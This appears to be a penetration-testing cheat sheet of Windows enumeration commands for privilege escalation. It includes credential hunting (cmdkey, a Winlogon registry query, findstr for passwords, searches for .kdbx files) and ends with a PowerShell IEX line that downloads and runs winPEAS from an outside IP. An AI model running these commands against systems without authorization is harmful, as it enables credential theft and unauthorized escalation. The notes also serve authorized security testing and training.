Situational Awareness

In this section we will show basic commands to gather enough information about our current situation and how we can use it to escalate privilege.

Current User

Privileges

whoami /priv

Groups Member

whoami /groups

Command History

Get-History

(Get-PSReadlineOption).HistorySavePath

Saved Credentials

cmdkey /list

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

---

Users

cmd.exe

net user

net user /domain

net user cub3 /domain

powershell.exe

Get-LocalUser

Get-LocalUser cub3

---

Groups

cmd.exe

net localgroup

net localgroup Administrators

net group /domain

net group "Domain Admins" /domain

powershell.exe

Get-LocalGroup

Get-LocalGroupMember Administrators

---

System Information

systeminfo

---

Network Information

ipconfig /all

route print

netstat -aon

netstat -a -p tcp | findstr LISTENING

---

Processes

cmd.exe

tasklist

wmic process list

wmic process get ProcessID,ExecutablePath,Commandline /format:list

powershell.exe

Get-Process

Get-WMIObject -Class Win32_Process

---

Installed Programs

32-bit

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname 

64-bit

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

---

Files

findstr /si password *.txt *.config *.yaml

Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.kdbx,*.config -File -Recurse -ErrorAction SilentlyContinue

---

Winpeas.exe

IEX (New-Object Net.Webclient).downloadstring("http://10.10.14.161/winPEAS.ps1")